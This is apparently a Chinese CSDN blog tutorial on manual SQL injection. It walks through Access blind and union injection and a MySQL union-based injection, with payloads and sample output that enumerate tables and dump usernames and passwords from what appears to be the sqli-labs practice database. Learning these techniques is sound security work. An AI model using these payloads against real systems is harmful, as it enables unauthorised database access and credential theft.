web安全之sql注入

最新推荐文章于 2024-03-18 19:32:43 发布
最新推荐文章于 2024-03-18 19:32:43 发布
阅读量188 收藏 1
点赞数
分类专栏: web安全之渗透测试入门 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zlbingo/article/details/107130242
版权

文章目录

SQL注入

access注入

access数据库类型

  • 以.mdb后缀命名
  • 可用office打开

注入基本流程

  • 判断注入
  1. 单引号报错
  2. 逻辑性 and 1=1 and 1=2
  3. 变量做运算 - 减号

常见的注入查询

  • 联合查询法
    • and 1=1 and 1=2 ------判断注入
    • order by 22 ------猜有多少列(猜到7列)
    • union select 1,2,3,4,5,6,7 from admin------猜表名并记录回显位(报错说明表不存在,将admin换成别的继续猜)
    • union select 1,2,username,4,5,6,7 from admin ——猜列名
  • 逐字猜解法
    • and exists (select * from admin)——猜表名
    • and exists (select user_name from admin)——猜列名
    • 查数据:1.确定长度 2.确定asc数据(asc编码)
    • and (select top 1 len(user_name ) from admin)=5 user_name 的长度=5,正常则=5,也可以用>,<号去判断)
    • and (select top 1 asc(mid(user_name ,1,1)) from admin)=97 判断第一位(97代表‘a’的ascll值)
    • and (select top 1 asc(mid(user_name ,2,1)) from admin)=97 判断第二位

MySQL注入

sql注入怎么产生

id变量通过get方式获取并且可直接拼接到sql语句中,而id参数用户可控,造成注入

mysql一般注入流程

流程:获取字段数-查库名-查表名-查列名-查数据

  1. 获取字段数

    order by x,通过不断修改x,得到其不报错的上限值

    通过order by 查询多少字段order by 3,假设3为临界值

    SELECT * FROM users WHERE id=1 order by 3

  2. 通过union查询数据库名,数据库版本,用户名

    SELECT * FROM users WHERE id=1 union select 1,2,3

    可将1,2,3修改为具体的sql函数

    sql函数:

    database():获取数据库名

    version():获取MySQL版本

    user():获取用户名

    union select version(),database(),user()

    ----------------------------------------------------------------------------------------------------
    ID : 1
    USERNAME: Dumb
    PASSWORD: Dumb
    ----------------------------------------------------------------------------------------------------
    ID : 5.5.53
    USERNAME: security
    PASSWORD: root@localhost

    可以看到,sql的版本为5.5.53,数据库为security,用户为root@localhost

  3. 通过union查询数据库中table名

    得到当前数据库名之后就可查询数据库中所包含的表

    union语句:将不同表的两个列查询的数据去重拼接

    information_schema.tables中记录了所有表名信息

    information_schema.columns 记录列名信息

    TABLE_SCHEMA 数据库字段,表所在的数据库的名字

    table_name 表名 column_name 列名

    SELECT * FROM users WHERE id=1 union select 1,2,table_name FROM information_schema.tables where TABLE_SCHEMA=database()

    :由于之前通过order by得到临界值为3,在查找其他内容是需要把所有的字段都占住,因此1,2不能少

    ----------------------------------------------------------------------------------------------------
    ID : 1
    USERNAME: Dumb
    PASSWORD: Dumb
    ----------------------------------------------------------------------------------------------------
    ID : 1
    USERNAME: 2
    PASSWORD: emails
    ----------------------------------------------------------------------------------------------------
    ID : 1
    USERNAME: 2
    PASSWORD: referers
    ----------------------------------------------------------------------------------------------------
    ID : 1
    USERNAME: 2
    PASSWORD: uagents
    ----------------------------------------------------------------------------------------------------
    ID : 1
    USERNAME: 2
    PASSWORD: users

    可以看到,主要有emails,referers,uagents,users这几个表

  4. 通过union查询表中的列名

    接下来查询users表中有哪些列

    column_name 列名

    union SELECT column_name FROM information_schema.columns where TABLE_name='users'

    ----------------------------------------------------------------------------------------------------
    ID : 1
    USERNAME: Dumb
    PASSWORD: Dumb
    ----------------------------------------------------------------------------------------------------
    ID : 1
    USERNAME: 2
    PASSWORD: id
    ----------------------------------------------------------------------------------------------------
    ID : 1
    USERNAME: 2
    PASSWORD: username
    ----------------------------------------------------------------------------------------------------
    ID : 1
    USERNAME: 2
    PASSWORD: password

    可以看到有id,usename,password这几列

  5. 通过列名查询数据

    接下来查询列中具体的数据

    union select 列名 from 库名.表名 # 库名不写也行

    union select id,username,password from users

    ----------------------------------------------------------------------------------------------------
    ID : 1
    USERNAME: Dumb
    PASSWORD: Dumb
    ----------------------------------------------------------------------------------------------------
    ID : 2
    USERNAME: Angelina
    PASSWORD: I-kill-you
    ----------------------------------------------------------------------------------------------------
    ID : 3
    USERNAME: Dummy
    PASSWORD: p@ssword
    ----------------------------------------------------------------------------------------------------
    ID : 4
    USERNAME: secure
    PASSWORD: crappy
    ----------------------------------------------------------------------------------------------------
    ID : 5
    USERNAME: stupid
    PASSWORD: stupidity
    ----------------------------------------------------------------------------------------------------
    ID : 6
    USERNAME: superman
    PASSWORD: genious
    ----------------------------------------------------------------------------------------------------
    ID : 7
    USERNAME: batman
    PASSWORD: mob!le
    ----------------------------------------------------------------------------------------------------
    ID : 8
    USERNAME: admin
    PASSWORD: admin

    这样就可以看到帐号和密码

zlbingo
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web攻击之常见的SQL注入(1),读完我这份《网络安全开发核心源码精编解析》面试至少多要3K
m0_60634964的博客
04-06 748
SELECT database(); SELECT schema_name FROM information_schema.schemata;–MySQL 4版本时用version=9,MySQL 5版本时用version=10 UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10; /* 列出当前数据库中的表 / UNION SELECT TABLE_NAME FROM informa
Web安全SQL注入(一)
weixin_50593647的博客
09-26 205
一、有关知识点 SQL语言 :结构化查询语言(Structured Query Language),简称SQL,是数据库的标准查询语言,可以通过DBMS(数据库管理系统)对数据库进行定义数据,操纵数据,查询数据,数据控制等。 数据库(database):数据库是一个按数据结构来存储和管理数据的计算机软件系统。 两者联系:数据库管理系统(DBMS-Database Management System)就是通过SQL语言对数据库进行管理的软件,我们常说的Mysql数据库、Sql Ser...
web安全SQL注入漏洞学习----初识sql(1)
最新发布
yikexiancai的博客
03-18 216
查询到了第一个初始数据库表,这里最后加的是;不是:一定要注意,如果出错了可以把数据库密码在小皮上改一下重新启动终端然后启动mysql应该就好了。sql漏洞是基于数据库的逻辑漏洞,因此,想要熟悉sql注入漏洞就必须要对sql语句有一定的了解。查询当前数据库发现就是这个数据库,这里不太严谨刚刚应该创两个数据库的。然后我们再试一下删除这个数据库(每个数据库都试一下加深印象)用小皮随便搞一个数据库我们就可以开始我们的sql之路辣。创建好以后我们先用终端来玩儿数据库,然后我们可以创建一个自己的数据库表。
web-sql注入
h1825819493的博客
07-12 234
前端的一个可控变量让我们可以自己构造数据库语句去非法访问后端的数据库.
SQL注入漏洞的简单代码实现,易懂
SoWhatWorld的博客
08-27 7223
小白浅谈:SQL注入漏洞 在程序的实际使用中,为了管理庞大的数据信息,就会使用到数据库。用户在使用程序时,程序可以自动通过自动对数据库查询,二我认为的注入漏洞即是同过一些查询数据库的语句来实现。 下面一段代码来演示SQL注入漏洞的原理: public static void main(String[] args) throws SQLException { Scanner scann
web安全学习——SQL注入
m0_71714379的博客
02-04 187
web安全学习笔记
web安全-sql注入漏洞
weixin_61956136的博客
07-18 1568
web安全-sql注入漏洞
Web安全SQL注入攻击
03-04
①这个晨讲我构思了两个星期,但是之前电脑坏了,一直拖...今天由我给大家带来《web安全SQL注入篇》系列晨讲,首先对课程进行简单介绍,SQL注入篇一共分为三讲:第一讲:“纸上谈兵:我们需要在本地架设注入环境,构
Web安全SQL注入
01-21
SQL注入是指将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。当Web应用程序的开发人员对用户所输入的数据不进行过滤或验证(即存在注入点...
网络安全——SQL注入漏洞
weixin_54055099的博客
09-08 1万+
SQL注入基本知识和SQL注入基本流程,sqli-labs
网络对抗课程SQL注入实验
xidianwuyanzu的博客
07-22 763
网络对抗实验二 1. 搭建 mysql 数据库,建立数据库 test,数据表 student,包含 id、name、score 三列。 2、环境:nginx+php-fpm 3、接口程序按老师给的资料里的php文件略微修改一下 根据输入的参数值,拼接SQL查询语句并执行,将查询结果展示。如根据输入的学号展示姓名和分数。(1.php) 手工sql注入:得到全部信息 根据输入的参数值,拼接 SQL 查询语句并执行,展示查询结果是否为空。如输入学号,展示是
WEB安全-SQL注入
weixin_56319791的博客
09-16 1776
SQL注入漏洞
Web安全----SQL注入
m0_49420271的博客
11-27 2020
时至今日,SQL注入仍是广大渗透爱好者聚焦的攻击方式,每四年更新一次的OWASP TOP 10【链接:link】都能够看到它的身影。今天,很荣幸和大家一起来探讨研究学习SQL注入的一些内容,如有不合适或者不正确的地方,欢迎大家留言。
SQL注入漏洞基础知识
LUOBIKUN的博客
09-18 703
SQL注入漏洞概述 SQL注入基本概念 前提: 1, 前端传入后端的参数是用户可控的; 2, 传入的参数拼接到SQL语句,且带入数据库查询。 成因: 由于WEB应用程序对用户输入的数据的合法性没有判断,用户通过可控参数中注入SQL语句,破坏原有SQL结构,达到编写程序时意料之外结果的攻击行为, 成因归结为两个: 1、程序编写者在处理程序和数据库交互时,使用字符串拼接的方式构造SQL语句。 2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中。 过程: 本质: 代码与数据不区分。 SQL注入
sql注入
qq_25376973的博客
10-24 194
  SQL注入 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。比如先前的很多影视网站泄露VIP会员密码大多...
SQL注入之Access注入 (手工)
adminlalala的博客
04-06 2993
什么是SQL注入SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息 ----百度百科 寻找注入点 首先呢,在网站中寻找传递参数的页面,也就是寻找注入点。 判断注入 找到页面(注入...
SQL注入系列之ASP+ACCESS手动注入(一)----数字型
热门推荐
fendo
12-30 2万+
一、access数据库 1.简介 Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 MicrosoftJet Database Engine 和 图形用户界面两项特点,是 Microsoft Office 的系统程序之一。 Microsoft Office Access是微软把数据库引擎的图形用户界面和软件开发工具结合在一起的一
实战初级SQL注入-access篇
edegod的博客
02-19 4589
这是我的第一篇文章,如有不好的地方还请多多担待,才开始接触网络安全,小白一个。学习过程中遇到了非常多的问题,过程中发现很少有关于纯新手的文章,入门很难,所以我写了这篇文章,带大家能够更简单的理解网络世界。话简单说,接下来是我看小迪渗透视频所学到的,我整理了一下,一步一步很详细,基本谁都能看懂。搭建虚拟机,安装镜像就跳过了,网上也说的很明白,至于特定的软件安装,百度也有详细的解决办法。SQL注入个人...
Web安全SQL注入基础
xlsj雪松的博客
04-29 846
最近看了好多优秀的文章,总结了一下之前学过的SQL注入。 第一篇 基础篇 1 SQL注入介绍 SQL是什么: 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统;同时也是数据库脚本文件的扩展名。 SQL注入是什么: 通过在⽤户可控的参数中注⼊SQL语法,破坏原有SQL结构,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值